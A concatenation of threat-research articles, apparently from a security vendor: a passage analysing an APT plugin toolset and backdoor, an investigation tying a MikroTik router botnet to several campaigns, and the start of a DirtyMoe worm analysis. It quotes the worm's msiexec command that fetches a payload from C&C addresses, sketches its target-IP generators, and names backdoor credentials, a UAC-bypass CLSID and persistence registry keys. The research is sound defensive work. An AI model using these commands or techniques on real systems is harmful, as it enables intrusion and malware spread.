the Zload plugin binary itself as <root_folder>\mec\logexts.dll,
<root_folder>\spdlogd.exe as <root_folder>\mec\spdagent.exe and
<root_folder>\kb.ini as <root_folder>\mec\kb.ini
After the files are renamed and moved, it creates a new process by executing the binary <root_folder>\mec\spdagent.exe (originally <root_folder>\spdlogd.exe).
core_zload (persistence setup)
This function is responsible for persistence, which it achieves by registering itself into the list of security support providers (SSPs). Windows SSP DLLs are loaded into the Local Security Authority (LSA) process when the system boots. The code of this function is notably similar to the mimikat_ssp/AddSecurityPackage_RawRPC source code found on GitHub.
DllMain (sideloading, setup)
The default DllMain function leverages several persistence and evasion techniques. It also allows the attacker to create a backdoor account on the infected system and lower the overall system security.
Persistence
The plugin first checks if its DLL was loaded either by the processes “lsass.exe” or “spdagent.exe”. If the DLL was loaded by “spdagent.exe”, it will adjust the token privileges of the current process.
If it was loaded by “lsass.exe”, it will retrieve the path “kb<num>.dll” from the configuration file “kb.ini” and write it under the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\ParametersAutodialDLL. This ensures persistence, as it causes the DLL “kb<num>.dll” to be loaded each time the Winsock 2 library (ws2_32.dll) is invoked.
Evasion
To avoid detection, the plugin first checks the list of running processes for “avp.exe” (Kaspersky Antivirus) or “NortonSecurity.exe” and exits if either of them is found. If these processes are not found on the system, it goes on to conceal itself by changing its own process name to “explorer.exe”.
The plugin also has the capability to bypass the UAC mechanisms and to elevate its process privileges through CMSTP COM interfaces, such as CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
Backdoor user account creation
Next, the plugin carries out registry manipulation (details can be found in the appendix), that lowers the system’s protection by:
Allowing local accounts to have full admin rights when they are authenticating via network logon
Enabling RDP connections to the machine without the user password
Disabling admin approval on an administrator account, which means that all applications run with full administrative privileges
Enabling anonymous SID to be part of the everyone group in Windows
Allowing “Null Session” users to list users and groups in the domain
Allowing “Null Session” users to access shared folders
Setting the name of the pipe that will be accessible to “Null Session” users
After this step, the plugin changes the WebClient service startup type to “Automatic”. It creates a new user with the name “DefaultAccount” and the password “Admin@1999!” which is then added to the “Administrator” and “Remote Desktop Users” groups. It also hides the new account on the logon screen.
As the last step, the plugin checks the list of running processes for process names “360tray.exe” and “360sd.exe” and executes the file "spdlogd.exe" if neither of them is found.
MecGame is another example of a plugin that can be loaded by the Core Plugin. Its main purpose is similar to the previously described Zload plugin – it executes the binary “spdlogd.exe” and achieves persistence by registering an RPC interface with UUID {1052E375-2CE2-458E-AA80-F3B7D6EA23AF}. This RPC interface represents a function that decodes and executes a base64 encoded shellcode.
The MecGame plugin has several methods for executing spdlogd.exe depending on the level of available privileges. It also creates a lockfile with the name MSSYS.lck or <UserName>-XPS.lck depending on the name of the process that loaded it, and deletes the files atomxd.dll and logexts.dll.
It can be installed as a service with the service name “inteloem” or can be loaded by any executable that connects to the internet via the Winsock2 library.
MulCom
This DLL is a backdoor module which exports four functions: “OperateRoutineW”, “StartRoutineW”, “StopRoutineW” and “WorkRoutineW”; the main malicious function is “StartRoutineW”.
For proper execution, the backdoor needs configuration data accessed through a shared object with the file mapping name either “Global\\4ED8FD41-2D1B-4CC3-B874-02F0C60FF9CB” or "Local\\4ED8FD41-2D1B-4CC3-B874-02F0C60FF9CB”. Unfortunately we didn’t come across the configuration data, so we are missing some information such as the C&C server domains this module uses.
There are 15 commands supported by this backdoor (although some of them are not implemented) referred to by the following numerical identifiers:
Command ID   Function description
1            Sends collected data from executed commands; used only if authentication with a proxy is done through NTLM
2            Finds out the domain name, user name and security identifier of the explorer.exe process; finds out the user name, domain name and computer name of all Remote Desktop sessions
3            Enumerates root disks
4            Enumerates files and finds out their creation time, last access time and last write time
5            Creates a process with a duplicated token; the token is obtained from one of the processes in the list (see Appendix)
6            Enumerates files and finds out their creation time, last access time and last write time
7            Renames files
8            Deletes files
9            Creates a directory
101          Sends an error code obtained via the GetLastError API function
102          Enumerates files in a specific folder and finds out their creation time, last access time and last write time
103          Uploads a file to the C&C server
104          Not implemented (reserved)
105/106/107 (combined)   Creates a directory and downloads files from the C&C server
Communication protocol
The MulCom backdoor is capable of communicating via HTTP and TCP protocols. The data it exchanges with the C&C servers is encrypted and compressed by the RC4 and aPack algorithms respectively, using the RC4 key loaded from the configuration data object.
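For reference, RC4 (the cipher named above) is a short, standard algorithm; the sketch below is a plain textbook implementation, not MulCom's code, and the per-sample key is loaded from the configuration object rather than hard-coded. The aPack compression step is omitted here:

```python
# Plain RC4 for reference. The same call both encrypts and decrypts,
# since RC4 is a symmetric stream cipher.
def rc4(key: bytes, data: bytes) -> bytes:
    # key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # pseudo-random generation algorithm (PRGA)
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```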
It is also capable of authenticating with proxy servers using the Basic, NTLM, or Negotiate schemes, or via the SOCKS4 and SOCKS5 protocols.
After successful authentication with a proxy server, the backdoor sends data XORed with the constant 0xBC. This data is a set with the following structure:
Another interesting capability of this backdoor is the usage of layered C&C servers. If this option is enabled in the configuration object (it is not the default option), the first request goes to the first layer C&C server, which returns the IP address of the second layer. Any subsequent communication goes to the second layer directly.
As previously stated, we found several code similarities between the MulCom DLL and the FFRat (a.k.a. FormerFirstRAT).
Conclusion
We have described a robust and modular toolset most likely used by a Chinese-speaking APT group targeting gambling-related companies in South East Asia. As we mentioned in this blogpost, there are notable code similarities between FFRat samples and the MulCom backdoor. FFRat, or “FormerFirstRAT”, has been publicly associated with the DragonOK group according to the Palo Alto Networks report; DragonOK has, in turn, been associated with backdoors like PoisonIvy and PlugX, tools commonly used by Chinese-speaking attackers.
We also described two different infection vectors, one of which weaponized a vulnerable WPS Office updater. We rate the threat this infection vector represents as very high, as WPS Office claims to have 1.2 billion installations worldwide, and this vulnerability potentially allows a simple way to execute arbitrary code on any of these devices. We have contacted WPS Office about the vulnerability we discovered and it has since been fixed.
Our research points to some unanswered questions, such as reliable attribution and the attackers’ motivation.
This is the story of piecing together information and research that led to the discovery of one of the largest botnet-as-a-service cybercrime operations we’ve seen in a while. This research reveals that the Glupteba cryptomining malware campaign we reported on in 2018, significant DDoS attacks targeting several companies in Russia (including Yandex) as well as in New Zealand and the United States, and presumably also the TrickBot malware were all distributed by the same C2 server. I strongly believe the C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers, and may be the Meris botnet QRator Labs described in their blog post, which helped carry out the aforementioned DDoS attacks. Default credentials and several vulnerabilities, most importantly CVE-2018-14847, which was publicized in 2018 and for which MikroTik issued a fix, allowed the cybercriminals behind this botnet to enslave all of these routers and presumably rent them out as a service.
The evening of July 8, 2021
As a fan of MikroTik routers, I keep a close eye on what’s going on with these routers. I have been tracking MikroTik routers for years, reporting a crypto mining campaign abusing the routers as far back as 2018. The mayhem around MikroTik routers began in 2018 mainly thanks to vulnerability CVE-2018-14847, which allowed cybercriminals to very easily bypass authentication on the routers. Sadly, many MikroTik routers were left unpatched, leaving their default credentials exposed on the internet.
Naturally, an email from our partners, sent on July 8, 2021, regarding a TrickBot campaign landed in my inbox. They informed us that they found a couple of new C2 servers that seemed to be hosted on IoT devices, specifically MikroTik routers, sending us the IPs. This immediately caught my attention.
MikroTik routers are pretty robust but run on a proprietary OS, so it seemed unlikely that the routers were hosting the C2 binary directly. The only logical conclusion I could come to was that the servers were using enslaved MikroTik devices to proxy traffic to the next tier of C2 servers to hide them from malware hunters.
I instantly had deja-vu, and thought “They are misusing that vulnerability aga…”.
Opening Pandora’s box full of dark magic and evil
Knowing all this, I decided to experiment by deploying a honeypot, more precisely a vulnerable version of a MikroTik cloud router exposed to the internet. I captured all the traffic and logged everything from the virtual device. Initially, I thought, let’s give it a week to see what’s going on in the wild.
In the past, we were only dealing with already compromised devices seeing the state they had been left in, after the fact. I was hoping to observe the initial compromise as it happened in real-time.
Exactly 15 minutes after deploying the honeypot (and it’s important to note that I intentionally changed the admin username and password to a really strong combination before activating it), I saw someone logging in to the router using the infamous CVE described above (which was later confirmed by PCAP analysis).
We’ve often seen compromised routers being instructed to fetch scripts from various domains hidden behind Cloudflare proxies.
But either by mistake, or maybe intentionally, the first fetch that happened after the attacker got inside went to:
bestony.club at that time was not hidden behind Cloudflare and resolved directly to an IP address (116.202.93.14), a VPS hosted by Hetzner in Germany. This first fetch served a script that tried to fetch additional scripts from the other domains.
What is the intention of this script, you ask? Well, as you can see, it tries to overwrite and rename all existing scheduled scripts named U3, U4..U7 and sets scheduled tasks to repeatedly import a script fetched from the particular address, replacing the first stage “bestony.info” with “globalmoby.xyz”. In this case, the domain is already hidden behind Cloudflare to minimize the likelihood of revealing the real IP address if the C2 server is spotted.
The second stage of the script, pulled from the C2, is more concrete and meaningful:
It hardens the router by closing all management interfaces, leaving only SSH and WinBox (the initial attack vector) open, and enables the SOCKS4 proxy server on port 5678.
Interestingly, all of the URLs had the same format:
http://[domainname]/poll/[GUID]
The logical assumption would be that the same system is serving them: bestony.club points to a real IP, while globalmoby.xyz is hidden behind a proxy, so Cloudflare probably hides the same IP. So, I did a quick test by issuing:
And it worked! Notice two things here: it’s necessary to set a --user-agent header to imitate the router; otherwise, it won’t work. I found out that the GUID doesn’t matter when issuing the request for the first time; the router is probably then registered in the database, so anything that fits the GUID format will work. The second observation was that every GUID works only once, or there is some rate limitation. Testing the endpoint, I also found that there is a bug or a “silent error” when the end of the URL doesn’t conform to the GUID format, for example:
This works too, and it works consistently, not just once. It seems that when inserting the URL into the database, an error/exception is thrown but silently ignored: nothing is written into the database, yet the script is still returned (which is quite interesting, as it would mean the scripts are not strictly tied to the ID of the victim).
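The polling request described above can be sketched without touching the network, just to show the shape of the URL and the imitation header. The domain here is a placeholder and the router-like User-Agent value is an assumption, not a captured string:

```python
import re
import urllib.request
import uuid

def build_poll_request(domain: str) -> urllib.request.Request:
    # any GUID-shaped value works for a first-time request
    guid = str(uuid.uuid4())
    req = urllib.request.Request(f"http://{domain}/poll/{guid}")
    # the endpoint only answers if the User-Agent imitates the router
    req.add_header("User-Agent", "Mikrotik/6.x Fetch")  # assumed UA value
    return req

req = build_poll_request("example.invalid")  # placeholder domain, no request sent
assert re.search(r"/poll/[0-9a-f-]{36}$", req.full_url)
```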
Listing used domains
bestony.club is the first stage, and it gets us the second stage script and the Cloudflare-hidden domain. You can see the GUID is reused throughout the stages. Given all that we’d learned, I tried to query the endpoint again:
It worked several times, and as a bonus, it was returning different domains now and then. So by creating a simple script, we “generated” a list of domains being actively used.
domain            IP              ISP
bestony.club      116.202.93.14   Hetzner, DE
massgames.space   multiple        Cloudflare
widechanges.best  multiple        Cloudflare
weirdgames.info   multiple        Cloudflare
globalmoby.xyz    multiple        Cloudflare
specialword.xyz   multiple        Cloudflare
portgame.website  multiple        Cloudflare
strtz.site        multiple        Cloudflare
The evil spreads its wings
Having all these domains, I decided to pursue the next step: checking whether all the domains hidden behind Cloudflare are actually hosted on the same server. I was increasingly convinced that the central C&C server was hosted there too. Using the same trick, querying the IP directly with the host header, led to the expected conclusion:
Yes, all the domains worked against the IP. Moreover, if you try to query a GUID using the host header trick:
It won’t work again using the full URL, and vice versa:
The second query returns an error because the GUID has already been registered by the first one, proving that we are accessing the same server and data.
Obviously, we found more than we asked for, but that was not the end.
A short history of CVE-2018-14847
It all probably started back in 2018, more precisely on April 23, when the Latvian hardware company MikroTik publicly announced that they had fixed and released an update for their very famous and widely used routers, patching the CVE-2018-14847 vulnerability. This vulnerability allowed anyone to literally download the user database and easily decode passwords from the device remotely, using just a few packets over the exposed administrative protocol on TCP port 8291. The bar was low enough for anyone to exploit it, and nothing could force users to update the firmware. So the outcome was as expected: cybercriminals started to exploit it.
The root cause
Tons of articles and analyses of this vulnerability have been published. The original explanation focused more on how the WinBox protocol works and the fact that you can request a file from the router if it’s not considered sensitive in the pre-auth state of communication. Unfortunately, the file-reading code path also contains a path traversal vulnerability that allows an attacker to access any file, even one considered sensitive. A great and detailed explanation is in this post from Tenable. The researchers also found that this path traversal vulnerability is shared among other “API function” handlers, so it’s also possible to write an arbitrary file to the router using the same trick, which greatly enlarges the attack surface.
Messy situation
Since then, we’ve been seeing plenty of different strains misusing the vulnerability. The first noticeable one was crypto mining malware cleverly setting up the router using standard functions and built-in proxy to inject crypto mining JavaScript into every HTTP request being made by users behind the router, amplifying the financial gain greatly. More in our Avast blog post from 2018.
Since then, the vulnerable routers resembled a war field, where various attackers were fighting for the device, overwriting each other’s scripts with their own. One such noticeable strain was Glupteba misusing the router and installing scheduled scripts that repeatedly reached out for commands from C2 servers to establish a SOCKS proxy on the device that allowed it to anonymize other malicious traffic.
Now, we see another active campaign is being hosted on the same servers, so is there any remote possibility that these campaigns are somehow connected?
Closing the loop
As mentioned before, all the leads led to this one particular IP address (which doesn’t work anymore)
116.202.93.14
It was more than evident that this IP is a C2 server used for an ongoing campaign, so let’s find out more about it, to see if we can find any ties or indication that it is connected to the other campaigns.
It turned out that this particular IP had already been seen and resolved to various domains. Using the RiskIQ service, we also found one prominent domain: tik.anyget.ru. Following the leads, digging deeper, and trying to find malicious samples that access this particular host, we bumped into this interesting sample:
The sample directly accessed the URL http://tik.anyget.ru/api/manager, from which it downloaded a JSON file with a list of IP addresses. The sample is an ARM32 SOCKS proxy server binary written in Go and linked to the Glupteba malware campaign. The first recorded submission in VirusTotal was from November 2020, which fits with the Glupteba outbreak.
It seems that the Glupteba malware campaign used the same server.
When requesting the URL http://tik.anyget.ru, I was redirected to http://routers.rip/site/login (again hidden behind the Cloudflare proxy); however, what we got will blow your mind:
This is a control panel for the orchestration of enslaved MikroTik routers. As you can see, the number at the top displays the actual number of devices connected to the botnet: close to 230K. To be sure we were still looking at the same host, we tried:
And it worked. Encouraged by this, I also tried several other IoCs from previous campaigns:
From the crypto mining campaign back in 2018:
To the Glupteba sample:
All of them worked. Either all of these campaigns are one, or we are witnessing a botnet-as-a-service. From what I’ve seen, I think the latter is more likely. When browsing through the control panel, I found one section that had not been password protected, a presets page in the control panel:
The oddity here is that the page automatically switches into Russian even though the rest stays in English (intention or mistake?). What we see here are configuration templates for MikroTik devices. One in particular tied the loop connecting the pieces together even more tightly: the VPN configuration template.
This confirms our suspicion, because these exact configurations can be found on all of our honeypots and affected routers:
Having all these indications and IoCs collected, I knew I was dealing with a trove of secrets and historical data going back to the beginning of the MikroTik campaign’s outbreak. I also ran a thorough IPv4 scan for SOCKS port 5678, which was a strong indicator of the campaign at that time, and came up with almost 400K devices with this port open. The SOCKS port was open on my honeypot, and as soon as it got infected, all the available bandwidth of 1Mbps was depleted in an instant. At that point, I thought this could be the enormous power needed for DDoS attacks, and then two days later…
Mēris
On September 7, 2021, QRator Labs published a blog post about a new botnet called Mēris. Mēris is a botnet of considerable scale misusing MikroTik devices to carry out one of the most significant DDoS attacks against Yandex, the biggest search engine in Russia, as well as attacks against companies in Russia, New Zealand, and the United States. It had all the features I’ve described in my investigation.
The day after the publication appeared, the C2 server stopped serving scripts, and the next day, it disappeared completely. I don’t know if this was part of a law enforcement action or just pure coincidence, with the attackers deciding to bail out on the operation in light of the public attention on Mēris. The same day, my honeypots restored their configuration by closing the SOCKS proxies.
TrickBot
As the IP addresses mentioned at the very beginning of this post sparked our wild investigation, we owe TrickBot a section in this post. The question that likely comes to mind now is: “Is TrickBot yet another campaign using the same botnet-as-a-service?” We can’t tell for sure. However, what we can share is what we found on devices. The way TrickBot proxies traffic using the NAT functionality in MikroTik usually looks like this:
Part of IoC fingerprint is that usually, the same rule is there multiple times, as the infection script doesn’t check if it is already there:
Although in the case of TrickBot we are not entirely sure if this could be taken as proof, I found some shared IoCs, such as:
Scheduled scripts / SOCKS proxies enabled as in previous case
Common password being set on most of the TrickBot MikroTik C2 proxies
It’s, however, not clear whether this is pure coincidence and a result of the router being infected more than once, or whether the same C2 was used. From the collected NAT translations, I’ve been able to identify a few IP addresses of the next tier of TrickBot C2 servers (see the IoCs section).
TrickBot doesn’t only use MikroTik devices
When investigating the TrickBot case, I saw (especially after the Mēris case was published) a slight shift over time towards IoT devices other than MikroTik. Using SSH port fingerprinting, I came across several devices with SSL certificates pointing to LigoWave devices. Again, the modus operandi seems to be the same: the initial infection vector appears to be default credentials, after which the device’s capabilities are used to proxy traffic from the public IP address to the TrickBot “hidden” C2 IP address.
Finding the default password took 0.35 seconds on Google.
The same password can be used to log in to the device over SSH as admin with full privileges; then it’s a matter of using iptables to set up the same NAT translation we saw in the MikroTik case.
They know the devices
During my research, what struck me was how much attention the criminals paid to details and subtle nuances. For example, we found one configuration on this device:
Knowing this device type, the attacker has disabled a physical display that loops through the stats of all the interfaces, purposefully to hide the fact that there is a malicious VPN running.
Remediation
The main and most important step to take is to update your router to the latest version and remove the administrative interface from the public-facing interface; you can follow the recommendations from our 2018 blog post, which are still valid. In regard to the TrickBot campaign, there are a few more things you can do:
Check all dst-nat mappings in your router. From an SSH or Telnet terminal, you can simply type /ip firewall nat print and look for NAT rules that match the aforementioned pattern or are otherwise suspicious, especially if the dst-address and to-address are both public IP addresses.
Check the usernames with /user print. If you see any unusual username, or any of the usernames from our IoCs, delete them.
If you can’t access your router on the usual ports, check the alternative ones listed in our IoCs, as attackers used to change them to prevent others from taking back ownership of the device.
Check the last paragraph of this blog post for more details on how to set up your router in a safe manner.
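In the spirit of the first remediation step, the "both addresses public" check can be automated over the output of /ip firewall nat print. This is a hedged sketch that assumes a simplified one-rule-per-line export format for illustration:

```python
import ipaddress
import re

def suspicious_dstnat(lines):
    """Flag dst-nat rules where both dst-address and to-addresses are public."""
    flagged = []
    for line in lines:
        dst = re.search(r"dst-address=([\d.]+)", line)
        to = re.search(r"to-addresses?=([\d.]+)", line)
        if not (dst and to):
            continue
        d = ipaddress.ip_address(dst.group(1))
        t = ipaddress.ip_address(to.group(1))
        if d.is_global and t.is_global:
            # public -> public forwarding looks like a C2 proxy rule
            flagged.append(line)
    return flagged
```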
Conclusion
Since 2018, vulnerable MikroTik routers have been misused for several campaigns. As some of the IoCs and my research indicate, I believe that a botnet offered as a service has been in operation since then.
It also shows what has been quite obvious for some time already (see our Q3 2021 report): IoT devices are heavily targeted not just to run malware on them, which is hard to write and spread massively considering all the different architectures and OS versions, but to use their legitimate, built-in capabilities to set them up as proxies. This is done either to anonymize the attacker’s traces or to serve as a DDoS amplification tool. What we see here is just the tip of the iceberg; properly and securely setting up devices and keeping them up to date is crucial to avoid becoming an easy target and helping facilitate criminal activity.
Just recently, new information popped up showing that the REvil ransomware gang is using MikroTik devices for DDoS attacks. The researchers from Imperva mention in their post that the Mēris botnet is likely being used to carry out the attack; however, as far as we know, the Mēris botnet was dismantled by Russian law enforcement. Whether this is a new reincarnation of the botnet, or the well-known vulnerabilities in MikroTik routers are simply being exploited again, I can’t tell right now. What I can tell is that patch adoption and, generally, the security of IoT devices, and routers in particular, is not good. It’s important to understand that updating devices is not the sole responsibility of router vendors; we are all responsible. To make this world more secure, we need to come together to jointly make sure routers are secure. So please, take a few minutes now to update your routers, set up a strong password, disable the administration interface on the public side, and help all the others who are not that technically savvy to do the same.
The DirtyMoe malware is deployed using various kits like PurpleFox or injected installers of Telegram Messenger that require user interaction. Complementary to this deployment, one of the DirtyMoe modules expands the malware using worm-like techniques that require no user interaction.
This research analyzes the worming module’s kill chain and the procedures used to launch and control the module through the DirtyMoe service. Other areas investigated include evaluating the risk of the identified exploits used by the worm and a detailed analysis of how its victim selection algorithm works. Finally, we examine its performance and provide a thorough examination of the entire worming workflow.
The analysis showed that the worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows Privilege Escalation. Another important discovery is a dictionary attack using Service Control Manager Remote Protocol (SCMR), WMI, and MS SQL services. Finally, an equally critical outcome is discovering the algorithm that generates victim target IP addresses based on the worming module’s geographical location.
One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords. Furthermore, the DirtyMoe malware uses a modular design; consequently, we expect other worming modules to be added to target prevalent vulnerabilities.
1. Introduction
DirtyMoe, the successful malware we documented in detail in the previous series, also implements mechanisms to reproduce itself. The most common way of deploying the DirtyMoe malware is via phishing campaigns or malvertising. In this series, we will focus on techniques that help DirtyMoe to spread in the wild.
The PurpleFox exploit kit (EK) is the most frequently observed approach to deploy DirtyMoe; the immediate focus of PurpleFox EK is to exploit a victim machine and install DirtyMoe. PurpleFox EK primarily abuses vulnerabilities in the Internet Explorer browser via phishing emails or popunder ads. For example, Guardicore described a worm spread by PurpleFox that abuses SMB services with weak passwords [2], infiltrating poorly secured systems. Recently, Minerva Labs has described the new infection vector installing DirtyMoe via an injected Telegram Installer [1].
Currently, we are monitoring three approaches used to spread DirtyMoe in the wild; Figure 1 illustrates the relationship between the individual concepts. The primary function of the DirtyMoe malware is crypto-mining; it is deployed to victims’ machines using different techniques. We have observed PurpleFox EK, the PurpleFox Worm, and injected Telegram Installers as mediums to spread and install DirtyMoe; we consider it highly likely that other mechanisms are used in the wild.
In the fourth article on this malware family, we described the deployment of the DirtyMoe service. Figure 2 illustrates the DirtyMoe hierarchy. The DirtyMoe service runs as a svchost process that starts two other processes: DirtyMoe Core and Executioner, which manages DirtyMoe modules. Typically, the executioner loads two modules: one for Monero mining and the other for worming replication.
Our research has been focused on worming since it seems that worming is one of the main mediums to spread the DirtyMoe malware. The PurpleFox worm described by Guardicore [2] is just the tip of the worming iceberg because DirtyMoe utilizes sophisticated algorithms and methods to spread itself into the wild and even to spread laterally in the local network.
The goal of the DirtyMoe worm is to exploit a target system and install itself into a victim machine. The DirtyMoe worm abuses several known vulnerabilities as follows:
CVE:2017-0144: EternalBlue SMB Remote Code Execution (MS17-010)
MS15-076: RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Dictionary attacks to MS SQL Servers, SMB, and Windows Management Instrumentation (WMI)
The prevalence of DirtyMoe is increasing in all corners of the world; this may be due to the DirtyMoe worm’s strategy of generating targets using a pseudo-random IP generator that considers the worm’s geographical and local network location. A consequence of this technique is that the worm is more flexible and effective given its location. In addition, DirtyMoe can be expanded to machines hidden behind NAT, as this strategy also provides lateral movement in local networks. A single DirtyMoe instance can generate and attack up to 6,000 IP addresses per second.
The insidiousness of the whole worm’s design is its modularization controlled by C&C servers. For example, DirtyMoe has a few worming modules targeting a specific vulnerability, and C&C determines which worming module will be applied based on information sent by a DirtyMoe instance.
The DirtyMoe worming module implements three basic phases common to all types of vulnerabilities. First, the module generates a list of IP addresses to target in the initial phase. Then, the second phase attacks specific vulnerabilities against these targets. Finally, the module performs dictionary attacks against live machines represented by the randomly generated IP addresses. The most common modules that we have observed are SMB and SQL.
This article focuses on the DirtyMoe worming module. We analyze and discuss the worming strategy, the exploits abused by the malware authors, and the module’s behavior according to its geographical location. One of the main topics is the performance of IP address generation, which is crucial for the malware’s success. We also examine the specific implementations of the abused exploits, including their origins.
2. Worm Kill Chain
We can describe the general workflow of the DirtyMoe worming module through the kill chain. Figure 3 illustrates stages of the worming workflow.
Reconnaissance The worming module generates targets at random but also considers the geolocation of the module. Each generated target is tested for the presence of vulnerable service versions; the module connects to the specific port where attackers expect vulnerable services and verifies whether the victim’s machine is live. If the verification is successful, the worming module collects basic information about the victim’s OS and versions of targeted services.
Weaponization The C&C server determines which specific module is used for worming. Currently, we do not know precisely what algorithm is used for module choice, but we suspect it depends on additional information sent to the C&C server by the DirtyMoe instance.
When the module verifies that a targeted victim’s machine is potentially exploitable, an appropriate payload is prepared, and an attack is started. The payload must be modified for each attack since a remote code execution (RCE) command is valid only for a few minutes.
Delivery In this kill chain phase, the worming module sends the prepared payload. The payload delivery is typically performed using protocols of targeted services, e.g., SMB or MS SQL protocols.
Exploitation and Installation If the payload is correct and the victim’s machine is successfully exploited, the RCE command included in the payload is run. Consequently, the DirtyMoe malware is deployed, as was detailed in the previous article (DirtyMoe: Deployment).
3. RCE Command
The main goal of the worming module is to achieve RCE under administrator privileges and install a new DirtyMoe instance. The general form of the executed command (@RCE@) is the same for each worming module: Cmd /c for /d %i in (@WEB@) do Msiexec /i http://%i/@FIN@ /Q
The command usually iterates through three IP addresses of C&C servers, including ports. IPs are represented by the placeholder @WEB@ filled on runtime. Practically, @WEB@ is regenerated for each payload sent since the IPs are rotated every minute utilizing sophisticated algorithms; this was described in Section 2 of the first blog.
The second placeholder is @FIN@ representing the DirtyMoe object’s name; this is, in fact, an MSI installer package. The package filename is in the form of a hash – [A-F0-9]{8}\.moe. The hash name is generated using a hardcoded hash table, methods for rotations and substrings, and by the MS_RPC_<n> string, where n is a number determined by the DirtyMoe service.
The core of the @RCE@ command is the execution of the remote DirtyMoe object (http://) via msiexec in silent mode (/Q). An example of a specific @RCE@ command is: Cmd /c for /d %i in (45.32.127.170:16148 92.118.151.102:19818 207.246.118.120:11410) do Msiexec /i http://%i/6067C695.moe /Q
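The placeholder substitution described above can be sketched in a few lines. This is a hypothetical reconstruction for illustration only: the template and the example values come from the article, but the helper function and its name are our assumptions, not the malware’s actual code.

```python
# Template of the @RCE@ command with its two runtime placeholders,
# @WEB@ (rotated C&C ip:port list) and @FIN@ (hash-named MSI package).
RCE_TEMPLATE = "Cmd /c for /d %i in ({web}) do Msiexec /i http://%i/{fin} /Q"

def build_rce_command(c2_endpoints, package_name):
    """Fill the placeholders; c2_endpoints is a list of 'ip:port' strings
    that the C&C logic rotates roughly every minute."""
    return RCE_TEMPLATE.format(web=" ".join(c2_endpoints), fin=package_name)

# Reproduces the concrete example observed in the wild.
cmd = build_rce_command(
    ["45.32.127.170:16148", "92.118.151.102:19818", "207.246.118.120:11410"],
    "6067C695.moe",
)
```

Because `msiexec` accepts a remote URL, a single short command is enough to fetch and silently install the package from whichever C&C address answers first.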
4. IP Address Generation
The key feature of the worming module is the generation of IP addresses (IPs) to attack. Six methods generate IPs with the help of a pseudo-random generator; each method focuses on a different IPv4 class. This contributes to a globally uniform distribution of attacked machines and increases the number of usable target IP addresses.
4.1 Class B from IP Table
The most significant proportion of generated addresses is provided by 10 threads generating IPs using a hardcoded list of 24,622 items. Each list item is in the form 0xXXXX0000, representing a Class B network. Each thread generates IPs as follows:
The algorithm randomly selects a Class B address from the list and, 65,536 times, generates a random number that is added to the selected Class B address. The effect is that the generated IP addresses fall within the geographical locations hardcoded in the list.
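The Class B strategy can be sketched as follows. This is a minimal reconstruction under our reading of the algorithm; the list entries here are illustrative placeholders, whereas the real module carries 24,622 hardcoded items and runs 10 such threads in parallel.

```python
import random

# Illustrative Class B bases in 0xXXXX0000 form; NOT the malware's real list.
CLASS_B_LIST = [0xC0A80000, 0x0A640000, 0x58C60000]

def generate_class_b_targets(rng=random.Random()):
    """Pick one hardcoded /16 and emit 65,536 random hosts inside it."""
    base = rng.choice(CLASS_B_LIST)
    for _ in range(65_536):
        yield base + rng.randint(0, 0xFFFF)  # random lower 16 bits

targets = list(generate_class_b_targets())
```

Because every emitted address shares the chosen /16 prefix, the geographical spread of the output is entirely determined by where the hardcoded networks are allocated.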
Figure 4 shows the geographical distribution of the hardcoded addresses. The continental distribution is separated into four parts: Asia, North America, Europe, and others (South America, Africa, Oceania). We verified this approach and generated 1M addresses using the algorithm; the result has a similar continental distribution. Hence, the implementation ensures that the IP address distribution is uniform.
4.2 Fully Random IP
The other three threads generate completely random IPs, so the geographical position is also entirely random. However, the fully random algorithm generates addresses in the lower classes more frequently.
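A minimal sketch of a fully random generator is below. Note this is a plain uniform draw for illustration; the bias toward lower classes observed in the module’s actual implementation is not reproduced here.

```python
import random

def random_ipv4(rng=random.Random()):
    """Draw a uniformly random 32-bit value and format it as dotted quad."""
    n = rng.randint(0, 0xFFFFFFFF)
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

ip = random_ipv4()
```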
4.3 Derived Classes A, B, C
Three other algorithms generate IPs based on an IP address of a machine (IPm) where the worming module runs. Consequently, the worming module targets machines in the nearby surroundings.
Addresses are derived from the IPm masked to the appropriate Class A/B/C, to which a random number representing the lower class bits is added.
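The mask-and-randomize step can be sketched like this; the function name and the placeholder module address are ours, but the masking logic follows the description above.

```python
import random

# Network masks for the three derived-class generators.
MASKS = {"A": 0xFF000000, "B": 0xFFFF0000, "C": 0xFFFFFF00}

def derive_target(ipm, klass, rng=random.Random()):
    """Keep the class prefix of the module's own address IPm and
    randomize the remaining lower bits."""
    mask = MASKS[klass]
    return (ipm & mask) + rng.randint(0, ~mask & 0xFFFFFFFF)

ipm = 0xD9000001          # placeholder module address (217.0.0.1)
t = derive_target(ipm, "C")
```

The closer the class (A → B → C), the smaller the randomized range, so Class C targets land in the module’s immediate network neighborhood.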
4.4 Derived Local IPs
The last IP generating method is represented by one thread that scans interfaces attached to local networks. The worming module lists local IPs using gethostbyname() and processes one local address every two hours.
Each local IP is masked to Class C, and 255 new local addresses are generated based on the masked address. As a result, the worming module attacks all local machines close to the infected machine in the local network.
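The local sweep reduces to masking an address to its /24 and enumerating the 255 host slots, as in this sketch (assumed semantics based on the description above):

```python
import ipaddress

def local_targets(local_ip: str):
    """Mask a local IP to Class C and generate the 255 neighbour addresses."""
    base = int(ipaddress.IPv4Address(local_ip)) & 0xFFFFFF00
    return [str(ipaddress.IPv4Address(base + i)) for i in range(1, 256)]

targets = local_targets("192.168.1.37")
```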
5. Attacks to Abused Vulnerabilities
We have detected two worming modules which primarily attack SMB services and MS SQL databases. Our team has been lucky since we also discovered something rare: a worming module, still under development, containing exploits targeting PHP, Java Deserialization, and Oracle Weblogic Server. In addition, the worming modules include a packed dictionary of 100,000 words used for dictionary attacks.
5.1 EternalBlue
